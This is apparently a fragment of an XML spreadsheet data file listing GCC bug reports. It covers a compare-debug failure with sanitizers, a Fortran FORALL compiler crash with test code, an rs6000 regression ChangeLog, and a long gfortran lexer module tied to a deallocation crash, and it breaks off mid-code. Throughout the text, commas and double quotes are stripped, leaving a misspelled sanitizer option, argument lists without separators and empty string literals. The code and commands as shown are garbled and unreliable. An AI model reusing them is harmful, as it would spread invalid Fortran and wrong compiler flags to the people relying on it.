    <t>GCC-65019</t>
  </si>
  <si>
    <t>[5 Regression] Compare debug failure with -fsanitize=alignmentobject-sizevptr -O3</t>
  </si>
  <si>
    <t>Created attachment 34726
input.ii (compile with: g++ -fcompare-debug -O2 -fsanitize=alignmentobject-sizevptr -std=c++11)
I found another one:
g++ input.ii -fcompare-debug -O2 -fsanitize=alignmentobject-sizevptr -std=c++11
gives:
g++: error: input.ii: -fcompare-debug failure</t>
  </si>
  <si>
    <t>GCC-55086</t>
  </si>
  <si>
    <t>ICE with FORALL in allocate_temp_for_forall_nest_1</t>
  </si>
  <si>
    <t>The following program crashes in trans-stmt.c:3234's allocate_temp_for_forall_nest_1 for:
3234      unit = fold_convert (gfc_array_index_type TYPE_SIZE_UNIT (type))
as TYPE_SIZE_UNIT(type) == NULL.
ICEs in the such-marked line. ICEs with GCC 4.1 to 4.8.
  implicit none
  character(len=5) pointer :: a(:) b(:)
  character(len=5) pointer :: c d
  allocate (a(2) b(2) c d)
  a = [ abcde ABCDE ]
  call aloct_pointer_copy_4 (b a)
  print * b(1)
  print * b(2)
  if (any (a /= b)) stop 'WRONG'
  call aloct_copy_4 (b a)
  print * b(1)
  print * b(2)
  if (any (a /= b)) stop 'WRONG'
  d = '12345'
  c = abcde
  call test2 (d c)
  print * d
  if (d /= '1cb15') stop 'WRONG'
  call test2p (d c)
  print * d
  if (d /= '1cb15') stop 'WRONG'
contains
 subroutine aloct_pointer_copy_4(o i)
  character(len=*) pointer :: o(:) i(:)
  integer :: nl1 nu1
  integer :: i1
  nl1 = lbound(idim=1)
  nu1 = ubound(idim=1)
  forall (i1 = nl1:nu1) o(i1) = i(i1)
 end subroutine aloct_pointer_copy_4
 subroutine aloct_copy_4(o i)
  character(len=*) pointer :: o(:) i(:)
  integer :: nl1 nu1
  integer :: i1
  nl1 = lbound(idim=1)
  nu1 = ubound(idim=1)
  forall (i1 = nl1:nu1) o(i1) = i(i1)
 end subroutine aloct_copy_4
 subroutine test2(o i)
  character(len=*) :: o i
  integer :: nl1 nu1
  integer :: i1
  nl1 = 2
  nu1 = 4
  forall (i1 = nl1:nu1) o(i1:i1) = i(i1:i1)
  forall (i1 = nl1:nu1) o(i1:i1) = o(nu1+1-i1:nu1+1-i1)
 end subroutine test2
 subroutine test2p(o i)
  character(len=*) pointer :: o i
  integer :: nl1 nu1
  integer :: i1
  nl1 = 2
  nu1 = 4
  forall (i1 = nl1:nu1) o(i1:i1) = i(i1:i1)   ! &lt;&lt;&lt;&lt; ICE
  forall (i1 = nl1:nu1) o(i1:i1) = o(nu1+1-i1:nu1+1-i1)
 end subroutine test2p
end</t>
  </si>
  <si>
    <t>GCC-68814</t>
  </si>
  <si>
    <t>[4.9 regression] gcc.dg/pr63594-2.c fails since r226005</t>
  </si>
  <si>
    <t>Hi Segher
We have a runtime test failure for gcc.dg/pr63594-2.c that started happening after r226005 was committed:
2015-07-20  Segher Boessenkool  
        PR target/66217
        * config/rs6000/constraints.md (S T t): Delete.  Update
        available letters comment.
        * config/rs6000/predicates.md (mask_operand mask_operand_wrap
        mask64_operand mask64_2_operand any_mask_operand and64_2_operand
        and_2rld_operand):  Delete.
        (and_operand): Adjust.
        (rotate_mask_operator): New.
        * config/rs6000/rs6000-protos.h (build_mask64_2_operands
        includes_lshift_p includes_rshift_p includes_rldic_lshift_p
        includes_rldicr_lshift_p insvdi_rshift_rlwimi_p extract_MB
        extract_ME): Delete.
        (rs6000_is_valid_mask rs6000_is_valid_and_mask
        rs6000_is_valid_shift_mask rs6000_is_valid_insert_mask
        rs6000_insn_for_and_mask rs6000_insn_for_shift_mask
        rs6000_insn_for_insert_mask rs6000_is_valid_2insn_and
        rs6000_emit_2insn_and): New.
        * config/rs6000/rs6000.c (num_insns_constant): Adjust.
        (build_mask64_2_operands includes_lshift_p includes_rshift_p
        includes_rldic_lshift_p includes_rldicr_lshift_p
        insvdi_rshift_rlwimi_p extract_MB extract_ME): Delete.
        (rs6000_is_valid_mask rs6000_is_valid_and_mask
        rs6000_insn_for_and_mask rs6000_is_valid_shift_mask
        s6000_insn_for_shift_mask rs6000_is_valid_insert_mask
        rs6000_insn_for_insert_mask rs6000_is_valid_2insn_and
        rs6000_emit_2insn_and): New.
        (print_operand) : Delete.
        (rs6000_rtx_costs) : Delete mask_operand and mask64_operand
        handling.
        : Don't fall through to next case.
        : Handle the various rotate-and-mask cases directly.
        : Always cost as one insn.
        * config/rs6000/rs6000.md (splitter for bswap:SI): Adjust.
        (and3): Adjust expander for the new patterns.
        (and3_imm and3_imm_dot and3_imm_dot2
        and3_imm_mask_dot and3_imm_mask_dot2): Adjust condition.
        (*and3_imm_dot_shifted): New.
        (*and3_mask): Delete rewrite as ...
        (and3_mask): ... New.
        (*and3_mask_dot *and3_mask_dot): Rewrite.
        (andsi3_internal0_nomc): Delete.
        (*andsi3_internal6): Delete.
        (*and3_2insn): New.
        (insv insvsi_internal *insvsi_internal1 *insvsi_internal2
        *insvsi_internal3 *insvsi_internal4 *insvsi_internal5
        *insvsi_internal6 insvdi_internal *insvdi_internal2
        *insvdi_internal3): Delete.
        (*rotl3_mask *rotl3_mask_dot *rotl3_mask_dot2
        *rotl3_insert *rotl3_insert_2 *rotl3_insert_3
        *rotl3_insert_4 two splitters for multi-precision shifts
        *ior_mask): New.
        (extzv extzvdi_internal *extzvdi_internal1 *extzvdi_internal2
        *rotlsi3_mask *rotlsi3_mask_dot *rotlsi3_mask_dot2
        *ashlsi3_imm_mask *ashlsi3_imm_mask_dot *ashlsi3_imm_mask_dot2
        *lshrsi3_imm_mask *lshrsi3_imm_mask_dot *lshrsi3_imm_mask_dot2):
        Delete.
        (ashr3): Delete expander.
        (*ashr3): Rename to ...
        (ashr3): ... This.
        (ashrdi3_no_power *ashrdisi3_noppc64be): Delete.
        (*rotldi3_internal4 *rotldi3_internal5 and split
        *rotldi3_internal6 and split *ashldi3_internal4 ashldi3_internal5
        and split *ashldi3_internal6 and split *ashldi3_internal7
        ashldi3_internal8 and split *ashldi3_internal9 and split): Delete.
        (*anddi3_2rld *anddi3_2rld_dot *anddi3_2rld_dot2): Delete.
        (splitter for loading a mask): Adjust.
        * doc/md.texi (Machine Constraints): Remove q S T t constraints.
Could you please take a look?
Thanks
Bill</t>
  </si>
  <si>
    <t>GCC-40440</t>
  </si>
  <si>
    <t>Automatic deallocation component of DT function return value</t>
  </si>
  <si>
    <t>In derived type structures which are themselves array-valued garbage is stored
and can produce segmentation faults. The behaviour seems erratic and not really reproduceable. The code makes use of the module iso_varying_string.f90 
which can be found here (putting it in below would have exceeded the limit of 64 kb for the description): http://www.fortran.com/iso_varying_string.f95. Just compile the example below including iso_varying_string.o with 4.5.0 and run
the binary. It shows where you should get garbage when using 4.5.0. 
I tried a stack trace and got this:
Program received signal SIGABRT Aborted.
0x00002b51812c4ed5 in raise () from /lib/libc.so.6
Program received signal SIGABRT Aborted.
0x00002b166f232ed5 in raise () from /lib/libc.so.6
#0  0x00002b166f232ed5 in raise () from /lib/libc.so.6
#1  0x00002b166f2343f3 in abort () from /lib/libc.so.6
#2  0x00002b166f26f3a8 in __libc_message () from /lib/libc.so.6
#3  0x00002b166f274948 in malloc_printerr () from /lib/libc.so.6
#4  0x00002b166f276a56 in free () from /lib/libc.so.6
#5  0x000000000040d380 in set_children.2047 () at syntax_rules.f90:752
#6  0x0000000000000000 in ?? ()
The output with gfortran 4.3.1 and 4.4.0 is perfectly regular.
CODE EXAMPLE:
module ifiles
  use iso_varying_string string_t =&gt; varying_string !NODEP!
  implicit none
  private
  public :: ifile_t
  public :: ifile_append
  public :: ifile_get_length
  public :: line_p
  public :: line_init
  public :: line_get_string_advance
  type :: line_entry_t
     private
     type(line_entry_t) pointer :: previous =&gt; null ()
     type(line_entry_t) pointer :: next =&gt; null ()
     type(string_t) :: string
     integer :: index
  end type line_entry_t
  type :: ifile_t
     private
     type(line_entry_t) pointer :: first =&gt; null ()
     type(line_entry_t) pointer :: last =&gt; null ()
     integer :: n_lines = 0
  end type ifile_t
  type :: line_p
     private
     type(line_entry_t) pointer :: p =&gt; null ()
  end type line_p
  interface ifile_append
     module procedure ifile_append_from_string
     module procedure ifile_append_from_char
  end interface
contains
  subroutine line_entry_create (line string)
    type(line_entry_t) pointer :: line
    type(string_t) intent(in) :: string
    allocate (line)
    line%string = string
  end subroutine line_entry_create
  subroutine ifile_append_from_string (ifile string)
    type(ifile_t) intent(inout) :: ifile
    type(string_t) intent(in) :: string
    type(line_entry_t) pointer :: current
    call line_entry_create (current string)
    current%index = ifile%n_lines + 1
    if (associated (ifile%last)) then
       current%previous =&gt; ifile%last
       ifile%last%next =&gt; current
    else
       ifile%first =&gt; current
    end if
    ifile%last =&gt; current
    ifile%n_lines = current%index
  end subroutine ifile_append_from_string
  subroutine ifile_append_from_char (ifile char)
    type(ifile_t) intent(inout) :: ifile
    character(*) intent(in) :: char
    call ifile_append_from_string (ifile var_str (trim (char)))
  end subroutine ifile_append_from_char
  function ifile_get_length (ifile) result (length)
    integer :: length
    type(ifile_t) intent(in) :: ifile
    length = ifile%n_lines
  end function ifile_get_length
  subroutine line_init (line ifile back)
    type(line_p) intent(inout) :: line
    type(ifile_t) intent(in) :: ifile
    logical intent(in) optional :: back
    if (present (back)) then
       if (back) then
          line%p =&gt; ifile%last
       else
          line%p =&gt; ifile%first
       end if
    else
       line%p =&gt; ifile%first
    end if
  end subroutine line_init
  subroutine line_advance (line)
    type(line_p) intent(inout) :: line
    if (associated (line%p))  line%p =&gt; line%p%next
  end subroutine line_advance
  function line_get_string_advance (line) result (string)
    type(string_t) :: string
    type(line_p) intent(inout) :: line
    if (associated (line%p)) then
       string = line%p%string
       call line_advance (line)
    else
       string = 
    end if
  end function line_get_string_advance
end module ifiles
module syntax_rules
  use iso_fortran_env only: STDERR =&gt; ERROR_UNIT
  use iso_varying_string string_t =&gt; varying_string
  use ifiles only: line_p line_init line_get_string_advance
  use ifiles only: ifile_t ifile_get_length
  implicit none
  private
  character parameter public :: BLANK = ' '  TAB = achar(9)
  character parameter public :: CR = achar(13) LF = achar(10)
  character(*) parameter public :: WHITESPACE_CHARS = BLANK// TAB // CR // LF
  character(*) parameter public :: LCLETTERS = abcdefghijklmnopqrstuvwxyz
  character(*) parameter public :: UCLETTERS = ABCDEFGHIJKLMNOPQRSTUVWXYZ
  character(*) parameter public :: DIGITS = 0123456789
  character(*) parameter public :: UNQUOTED = ()|_//LCLETTERS//UCLETTERS//DIGITS
  public :: S_UNKNOWN
  public :: S_KEYWORD
  public :: S_SEQUENCE
  public :: syntax_t
  public :: syntax_init
  public :: syntax_get_rule_ptr
  public :: stream_t
  public :: lexer_t
  public :: syntax_rule_t
  integer parameter :: S_UNKNOWN = 0 S_KEYWORD = 6 S_SEQUENCE = 7
  integer parameter :: T_KEYWORD = 1
  integer parameter :: T_IDENTIFIER = 2 T_QUOTED = 3 T_NUMERIC = 4
  integer parameter :: EMPTY = 0 WHITESPACE = 10
  integer parameter :: NO_MATCH = 11 IO_ERROR = 12 OVERFLOW = 13
  integer parameter :: UNMATCHED_QUOTE = 14
  type :: stream_t
     type(string_t) pointer :: filename =&gt; null ()
     integer pointer :: unit =&gt; null ()
     type(string_t) pointer :: string =&gt; null ()
     type(ifile_t) pointer :: ifile =&gt; null ()
     type(line_p) pointer :: line =&gt; null ()
  end type stream_t
  type :: keyword_entry_t
     private
     type(string_t) :: string
     type(keyword_entry_t) pointer :: next =&gt; null ()
  end type keyword_entry_t
  type :: keyword_list_t
     private
     type(keyword_entry_t) pointer :: first =&gt; null ()
     type(keyword_entry_t) pointer :: last =&gt; null ()
  end type keyword_list_t
  type :: template_t
     private
     integer :: type
     character(256) :: charset1 charset2
     integer :: len1 len2
  end type template_t
  type :: lexer_setup_t
     private
     type(template_t) dimension(:) allocatable :: tt
     integer dimension(:) allocatable :: type
     type(keyword_list_t) pointer :: keyword_list =&gt; null ()
  end type lexer_setup_t
  type :: lexeme_t
     private
     integer :: type = 0
     type(string_t) :: s
     integer :: b = 0 e = 0
  end type lexeme_t
  type :: lexer_t
     private
     type(lexer_setup_t) :: setup
     type(lexeme_t) :: lexeme
     type(string_t) :: line_buffer
     integer :: current_line
     integer :: current_column
     integer :: previous_column
     type(string_t) :: buffer
  end type lexer_t
  type :: rule_p
     private
     type(syntax_rule_t) pointer :: p =&gt; null ()
  end type rule_p
  type :: syntax_rule_t
     private
     integer :: type = S_UNKNOWN
     logical :: used = .false.
     type(string_t) :: keyword
     type(string_t) :: separator
     type(string_t) dimension(2) :: delimiter
     type(rule_p) dimension(:) allocatable :: child
     character(1) :: modifier = 
     logical :: opt = .false. rep = .false.
  end type syntax_rule_t
  type :: syntax_t
     private
     type(syntax_rule_t) dimension(:) allocatable :: rule
     type(keyword_list_t) :: keyword_list
  end type syntax_t
  interface syntax_init
     module procedure syntax_init_from_ifile
  end interface
  interface stream_init
     module procedure stream_init_string
  end interface
contains
  subroutine stream_get_record (stream string iostat)
    type(stream_t) intent(inout) :: stream
    type(string_t) intent(out) :: string
    integer intent(out) :: iostat
    if (associated (stream%unit)) then
       call get (stream%unit string iostat=iostat)
       if (iostat == -2)  iostat = 0
    else if (associated (stream%string)) then
       if (len (stream%string) /= 0) then
          string = stream%string
          stream%string = 
          iostat = 0
       else
          iostat = -1
       end if
    else
       write (STDERR *)  Attempt to read from uninitialized input stream
       flush (STDERR)
       stop
    end if
  end subroutine stream_get_record
  pure function template_whitespace (chars) result (tt)
    character(*) intent(in) :: chars
    type(template_t) :: tt
    tt = template_t (WHITESPACE chars  len (chars) 0)
  end function template_whitespace
  pure function template_quoted (chars1 chars2) result (tt)
    character(*) intent(in) :: chars1 chars2
    type(template_t) :: tt
    tt = template_t (T_QUOTED chars1 chars2 len (chars1) len (chars2))
  end function template_quoted
  pure function template_numeric (chars) result (tt)
    character(*) intent(in) :: chars
    type(template_t) :: tt
    tt = template_t (T_NUMERIC chars  len (chars) 0)
  end function template_numeric
  pure function template_identifier (chars1 chars2) result (tt)
    character(*) intent(in) :: chars1 chars2
    type(template_t) :: tt
    tt = template_t (T_IDENTIFIER chars1 chars2 len(chars1) len(chars2))
  end function template_identifier
  function lexeme_is_break (t) result (break)
    logical :: break
    type(lexeme_t) intent(in) :: t
    select case (t%type)
    case (-1 IO_ERROR OVERFLOW NO_MATCH)
       break = .true.
    case default
       break = .false.
    end select
  end function lexeme_is_break
  subroutine lexeme_set (t keyword_list s range type)
    type(lexeme_t) intent(out) :: t
    type(keyword_list_t) pointer :: keyword_list
    type(string_t) intent(in) :: s
    integer dimension(2) intent(in) :: range
    integer intent(in) :: type
    t%type = type
    if (type == T_IDENTIFIER) then
       if (associated (keyword_list)) then
          if (keyword_list_contains (keyword_list s))  t%type = T_KEYWORD
       end if
    end if
    t%s = s
    t%b = range(1)
    t%e = range(2)
  end subroutine lexeme_set
  subroutine stream_init_string (stream string)
    type(stream_t) intent(out) :: stream
    type(string_t) intent(in) :: string
    allocate (stream%string)
    stream%string = string
  end subroutine stream_init_string
  subroutine stream_final (stream)
    type(stream_t) intent(inout) :: stream
    if (associated (stream%filename)) then
       close (stream%unit)
       deallocate (stream%unit)
       deallocate (stream%filename)
    else if (associated (stream%unit)) then
       deallocate (stream%unit)
    else if (associated (stream%string)) then
       deallocate (stream%string)
    end if
  end subroutine stream_final
  subroutine lexeme_clear (t)
    type(lexeme_t) intent(out) :: t
    t%type = 0
    t%s = 
  end subroutine lexeme_clear
  subroutine lexer_clear (lexer)
    type(lexer_t) intent(inout) :: lexer
    call lexeme_clear (lexer%lexeme)
    lexer%line_buffer = 
    lexer%current_line = 0
    lexer%current_column = 0
    lexer%previous_column = 0
    lexer%buffer = 
  end subroutine lexer_clear
  function lexeme_get_string (t) result (s)
    type(string_t) :: s
    type(lexeme_t) intent(in) :: t
    s = t%s
  end function lexeme_get_string
  function lexeme_get_contents (t) result (s)
    type(string_t) :: s
    type(lexeme_t) intent(in) :: t
    s = extract (t%s t%b t%e)
    write (STDERR *) lexeme_get_contents -&gt;  char (s)
    flush (STDERR)
  end function lexeme_get_contents
  subroutine lexer_setup_final (setup)
    type(lexer_setup_t) intent(inout) :: setup
    deallocate (setup%tt setup%type)
    setup%keyword_list =&gt; null ()
  end subroutine lexer_setup_final
  subroutine keyword_list_add (keylist string)
    type(keyword_list_t) intent(inout) :: keylist
    type(string_t) intent(in) :: string
    type(keyword_entry_t) pointer :: k_entry_new
    if (.not. keyword_list_contains (keylist string)) then
       allocate (k_entry_new)
       k_entry_new%string = string
       if (associated (keylist%first)) then
          keylist%last%next =&gt; k_entry_new
       else
          keylist%first =&gt; k_entry_new
       end if
       keylist%last =&gt; k_entry_new
    end if
  end subroutine keyword_list_add
  function keyword_list_contains (keylist string) result (found)
    type(keyword_list_t) intent(in) :: keylist
    type(string_t) intent(in) :: string
    logical :: found
    found = .false.
    call check_rec (keylist%first)
  contains
    recursive subroutine check_rec (k_entry)
      type(keyword_entry_t) pointer :: k_entry
      if (associated (k_entry)) then
         if (k_entry%string /= string) then
            call check_rec (k_entry%next)
         else
            found = .true.
         end if
      end if
    end subroutine check_rec
  end function keyword_list_contains
  subroutine lex (lexeme lexer stream)
    type(lexeme_t) intent(out) :: lexeme
    type(lexer_t) intent(inout) :: lexer
    type(stream_t) intent(inout) :: stream
    integer :: iostat1 iostat2
    integer :: pos
    integer dimension(2) :: range
    integer :: template_index type
    GET_LEXEME: do while (lexeme_get_type (lexer%lexeme) == 0)
       if (len (lexer%buffer) /= 0) then
          iostat1 = 0
       else
          call lexer_read_line (lexer stream iostat1)
       end if
       select case (iostat1)
       case (0)
          MATCH_BUFFER: do
             call match (lexer%setup%tt char (lexer%buffer) &amp;
                         pos range template_index)
             if (pos &gt;= 0) then
                type = lexer%setup%type(template_index)
                exit MATCH_BUFFER
             else
                pos = 0
                call lexer_read_line (lexer stream iostat2)
                select case (iostat2)
                case (-1) type = UNMATCHED_QUOTE exit MATCH_BUFFER
                case (1)   type = IO_ERROR        exit MATCH_BUFFER
                case (2)   type = OVERFLOW        exit MATCH_BUFFER
                end select
             end if
          end do MATCH_BUFFER
       case (-1) type = -1
       case (1)   type = IO_ERROR
       case (2)   type = OVERFLOW
       end select
       call lexeme_set (lexer%lexeme lexer%setup%keyword_list &amp;
            extract (lexer%buffer finish=pos) range type)
       lexer%buffer = remove (lexer%buffer finish=pos)
       lexer%previous_column = max (lexer%current_column 0)
       lexer%current_column = lexer%current_column + pos
    end do GET_LEXEME
    lexeme = lexer%lexeme
    call lexeme_clear (lexer%lexeme)
  end subroutine lex
  function lexeme_get_type (t) result (type)
    integer :: type
    type(lexeme_t) intent(in) :: t
    type = t%type
  end function lexeme_get_type
  subroutine lexer_setup_init (setup &amp;
       comment_chars quote_chars quote_match &amp;
       single_chars special_class &amp;
       keyword_list)
    type(lexer_setup_t) intent(inout) :: setup
    character(*) intent(in) :: comment_chars
    character(*) intent(in) :: quote_chars quote_match
    character(*) intent(in) :: single_chars
    character(*) dimension(:) intent(in) :: special_class
    type(keyword_list_t) pointer :: keyword_list
    integer :: n i
    n = 1 + len (comment_chars) + len (quote_chars) + 1 &amp;
         + len (single_chars) + size (special_class) + 1
    write (STDERR *) n   : n
    flush (STDERR)
    allocate (setup%tt(n))
    allocate (setup%type(0:n))
    n = 0
    setup%type(n) = NO_MATCH
    n = n + 1
    setup%tt(n) = template_whitespace (WHITESPACE_CHARS)
    setup%type(n) = EMPTY
    forall (i = 1:len(comment_chars))
       setup%tt(n+i) = template_quoted (comment_chars(i:i) LF)
       setup%type(n+i) = EMPTY
    end forall
    n = n + len (comment_chars)
    forall (i = 1:len(quote_chars))
       setup%tt(n+i) = template_quoted (quote_chars(i:i) quote_match(i:i))
       setup%type(n+i) = T_QUOTED
    end forall
    n = n + len (quote_chars)
    setup%tt(n+1) = template_numeric (EeDd)
    setup%type(n+1) = T_NUMERIC
    n = n + 1
    forall (i = 1:len (single_chars))
       setup%tt(n+i) = template_identifier (single_chars(i:i) )
       setup%type(n+i) = T_IDENTIFIER
    end forall
    n = n + len (single_chars)
    forall (i = 1:size (special_class))
       setup%tt(n+i) = template_identifier &amp;
            (trim (special_class(i)) trim (special_class(i)))
       setup%type(n+i) = T_IDENTIFIER
    end forall
    n = n + size (special_class)
    setup%tt(n+1) = template_identifier &amp;
         (LCLETTERS//UCLETTERS LCLETTERS//DIGITS//_//UCLETTERS)
    setup%type(n+1) = T_IDENTIFIER
    n = n + 1
    if (n /= size (setup%tt)) then
       write (STDERR *) Size mismatch in lexer setup
       flush (STDERR)
    endif
    setup%keyword_list =&gt; keyword_list
  end subroutine lexer_setup_init
  subroutine lexer_init (lexer &amp;
       comment_chars quote_chars quote_match &amp;
       single_chars special_class &amp;
       keyword_list)
    type(lexer_t) intent(inout) :: lexer
    character(*) intent(in) :: comment_chars
    character(*) intent(in) :: quote_chars quote_match
    character(*) intent(in) :: single_chars
    character(*) dimension(:) intent(in) :: special_class
    type(keyword_list_t) pointer :: keyword_list
    call lexer_setup_init (lexer%setup &amp;
         comment_chars = comment_chars &amp;
         quote_chars = quote_chars &amp;
         quote_match = quote_match &amp;
         single_chars = single_chars &amp;
         special_class = special_class &amp;
         keyword_list = keyword_list)
    call lexer_clear (lexer)
  end subroutine lexer_init
  subroutine lexer_read_line (lexer stream iostat)
    type(lexer_t) intent(inout) :: lexer
    type(stream_t) intent(inout) :: stream
    integer intent(out) :: iostat
    call stream_get_record (stream lexer%line_buffer iostat)
    lexer%current_line = lexer%current_line + 1
    if (iostat == 0) then
       lexer%buffer = lexer%buffer // lexer%line_buffer // LF
    end if
  end subroutine lexer_read_line
  subroutine match_numeric (tt s n)
    type(template_t) intent(in) :: tt
    character(*) intent(in) :: s
    integer intent(out) :: n
    integer :: i n0
    character(10) parameter :: digits = 0123456789
    character(2) parameter :: signs = -+
    n = verify (s digits) - 1
    if (n &lt; 0) then
       n = 0
       return
    else if (s(n+1:n+1) == .) then
       i = verify (s(n+2:) digits) - 1
       if (i &lt; 0) then
          n = len (s)
          return
       else if (i &gt; 0 .or. n &gt; 0) then
          n = n + 1 + i
       end if
    end if
    n0 = n
    if (n &gt; 0) then
       if (verify (s(n+1:n+1) tt%charset1(1:tt%len1)) == 0) then
          n = n + 1
          if (verify (s(n+1:n+1) signs) == 0)  n = n + 1
          i = verify (s(n+1:) digits) - 1
          if (i &lt; 0) then
             n = len (s)
          else if (i == 0) then
             n = n0
          else
             n = n + i
          end if
       end if
    end if
  end subroutine match_numeric
  subroutine match_identifier (tt s n)
    type(template_t) intent(in) :: tt
    character(*) intent(in) :: s
    integer intent(out) :: n
    if (verify (s(1:1) tt%charset1(1:tt%len1)) == 0) then
       n = verify (s(2:) tt%charset2(1:tt%len2))
       if (n == 0)  n = len (s)
    else
       n = 0
    end if
  end subroutine match_identifier
  subroutine match_template (tt s n range)
    type(template_t) intent(in) :: tt
    character(*) intent(in) :: s
    integer intent(out) :: n
    integer dimension(2) intent(out) :: range
    select case (tt%type)
    case (WHITESPACE)
       call match_whitespace (tt s n)
       range = 0
    case (T_IDENTIFIER)
       call match_identifier (tt s n)
       range(1) = 1
       range(2) = len_trim (s)
    case (T_QUOTED)
       call match_quoted (tt s n range)
    case (T_NUMERIC)
       call match_numeric (tt s n)
       range(1) = 1
       range(2) = len_trim (s)
    case default
       write (STDERR *) Invalid lexeme template encountered
       flush (STDERR)
       stop
    end select
  end subroutine match_template
  subroutine match_quoted (tt s n range)
    type(template_t) intent(in) :: tt
    character(*) intent(in) :: s
    integer intent(out) :: n
    integer dimension(2) intent(out) :: range
    character(tt%len1) :: ch1
    character(tt%len2) :: ch2
    integer :: i
    ch1 = tt%charset1
    if (s(1:tt%len1) == ch1) then
       ch2 = tt%charset2
       do i = tt%len1 + 1 len (s) - tt%len2 + 1
          if (s(i:i+tt%len2-1) == ch2) then
             n = i + tt%len2 - 1
             range(1) = tt%len1 + 1
             range(2) = i - 1
             return
          end if
       end do
       n = -1
       range = 0
    else
       n = 0
       range = 0
    end if
  end subroutine match_quoted
  subroutine match (tt s n range ii)
    type(template_t) dimension(:) intent(in) :: tt
    character(*) intent(in) :: s
    integer intent(out) :: n
    integer dimension(2) intent(out) :: range
    integer intent(out) :: ii
    integer :: i
    do i = 1 size (tt)
       call match_template (tt(i) s n range)
       if (n /= 0) then
          ii = i
          return
       end if
    end do
    n = 0
    ii = 0
  end subroutine match
  subroutine match_whitespace (tt s n)
    type(template_t) intent(in) :: tt
    character(*) intent(in) :: s
    integer intent(out) :: n
    n = verify (s tt%charset1(1:tt%len1)) - 1
    if (n &lt; 0)  n = len (s)
  end subroutine match_whitespace
  elemental function rule_is_associated (rp) result (ok)
    logical :: ok
    type (rule_p) intent(in) :: rp
    ok = associated (rp%p)
  end function rule_is_associated
  subroutine syntax_rule_init (rule key type)
    type(syntax_rule_t) intent(inout) :: rule
    type(string_t) intent(in) :: key
    integer intent(in) :: type
    rule%keyword = key
    rule%type = type
  end subroutine syntax_rule_init
  function is_modifier (string) result (ok)
    logical :: ok
    type(string_t) intent(in) :: string
    select case (char (string))
    case (  ? * +)  ok = .true.
    case default               ok = .false.
    end select
  end function is_modifier
  subroutine syntax_rule_set_sub (rule i sub)
    type(syntax_rule_t) intent(inout) :: rule
    integer intent(in) :: i
    type(syntax_rule_t) intent(in) target :: sub
    write (STDERR *) entering syntax_rule_set_sub i =  i
    flush (STDERR)
    rule%child(i)%p =&gt; sub
    write (STDERR *) exiting syntax_rule_set_sub
    flush (STDERR)
    return
  end subroutine syntax_rule_set_sub
  subroutine syntax_init_from_ifile (syntax ifile)
    type(syntax_t) intent(out) target :: syntax
    type(ifile_t) intent(in) :: ifile
    type(lexer_t) :: lexer
    type(line_p) :: line
    type(string_t) :: string
    integer :: n_token
    integer :: i
    call lexer_init (lexer &amp;
       comment_chars =  &amp;
       quote_chars = &lt;' &amp;
       quote_match = &gt;' &amp;
       single_chars = *+|=() &amp;
       special_class = (/ . /) &amp;
       keyword_list = null ())
    allocate (syntax%rule (ifile_get_length (ifile)))
    call line_init (line ifile)
    do i = 1 size (syntax%rule)
       string = line_get_string_advance (line)
       call set_rule_type_and_key (syntax%rule(i) string lexer)
    end do
    call line_init (line ifile)
    write (STDERR *) size syntax rule size (syntax%rule)
    flush (STDERR)
    do i = 1 size (syntax%rule)
       write (STDERR *) ### Loop index i: i of  size(syntax%rule)
       flush (STDERR)
       string = line_get_string_advance (line)
       write (STDERR *) string  char(string)  ###
       flush (STDERR)
       write (STDERR *) do loop syntax rule string: i syntax%rule(i)%type
       flush (STDERR)
       select case (syntax%rule(i)%type)
       case (S_SEQUENCE)
          n_token = get_n_token (string lexer)
          write (STDERR *) ntoken =  n_token
          flush (STDERR)
          call set_rule_contents &amp;
               (syntax%rule(i) syntax n_token string lexer)
       end select
       write (STDERR *) after the select
       flush (STDERR)
    end do
  end subroutine syntax_init_from_ifile
  subroutine set_rule_type_and_key (rule string lexer)
    type(syntax_rule_t) intent(inout) :: rule
    type(string_t) intent(in) :: string
    type(lexer_t) intent(inout) :: lexer
    type(stream_t) :: stream
    type(lexeme_t) :: lexeme
    type(string_t) :: key
    character(2) :: type
    call lexer_clear (lexer)
    call stream_init (stream string)
    call lex (lexeme lexer stream)
    type = lexeme_get_string (lexeme)
    call lex (lexeme lexer stream)
    key = lexeme_get_contents (lexeme)
    call stream_final (stream)
    if (trim (key) /= ) then
       select case (type)
       case (KE)  call syntax_rule_init (rule key S_KEYWORD)
       case (SE)  call syntax_rule_init (rule key S_SEQUENCE)
       case default
          write (STDERR *)  Syntax definition: unknown type ' // type // '
          flush (STDERR)
          stop
       end select
    else
       write (STDERR *) char (string)
       flush (STDERR)
       write (STDERR *)  Syntax definition: empty rule key
       flush (STDERR)
       stop
    end if
  end subroutine set_rule_type_and_key
  function get_n_token (string lexer) result (n)
    integer :: n
    type(string_t) intent(in) :: string
    type(lexer_t) intent(inout) :: lexer
    type(stream_t) :: stream
    type(lexeme_t) :: lexeme
    integer :: i
    call stream_init (stream string)
    call lexer_clear (lexer)
    i = 0
    do
       call lex (lexeme lexer stream)
       if (lexeme_is_break (lexeme))  exit
       i = i + 1
    end do
    n = i
    call stream_final (stream)
  end function get_n_token
  subroutine set_rule_contents (rule syntax n_token string lexer)
    type(syntax_rule_t) intent(inout) :: rule
    type(syntax_t) intent(in) target :: syntax
    integer intent(in) :: n_token
    type(string_t) intent(in) :: string
    type(lexer_t) intent(inout) :: lexer
    type(stream_t) :: stream
    type(lexeme_t) dimension(n_token) :: lexeme
    integer :: i n_children
    write (STDERR *) entering set_rule_contents n_token =  n_token
    flush (STDERR)
    call lexer_clear (lexer)
    call stream_init (stream string)
    do i = 1 n_token
       call lex (lexeme(i) lexer stream)
    end do
    call stream_final (stream)
    n_children = get_n_children ()
    write (STDERR *) n_children =  n_children
    flush (STDERR)
    if (n_children &gt; 0)  call set_children
    write (STDERR *) exiting set_rule_contents
    flush (STDERR)
  contains
    function get_n_children () result (n)
      integer :: n
      select case (rule%type)
      case (S_SEQUENCE)
         write (STDERR *) in select case of get_n_children: S_SEQUENCE
         flush (STDERR)
         if (is_modifier (lexeme_get_string (lexeme(n_token)))) then
            write (STDERR *) unexpected is_modifier
            flush (STDERR)
            stop
         else 
            if (n_token &lt;= 3) then
               write (STDERR *) Broken rule
               flush (STDERR)
            end if
            n = n_token - 3
            write (STDERR *) children token (n&lt;=3) n n_token
            flush (STDERR)
         end if
      end select
    end function get_n_children
    subroutine set_children
      write (STDERR *) entering set_children n_children =  n_children
      flush (STDERR)
      allocate (rule%child(n_children))
      write (STDERR *) allocated rule%child
      flush (STDERR)
      do i = 1 size (lexeme)
         write (STDERR *) lexeme( i ) =  char(lexeme(i)%s)
         flush (STDERR)
      end do
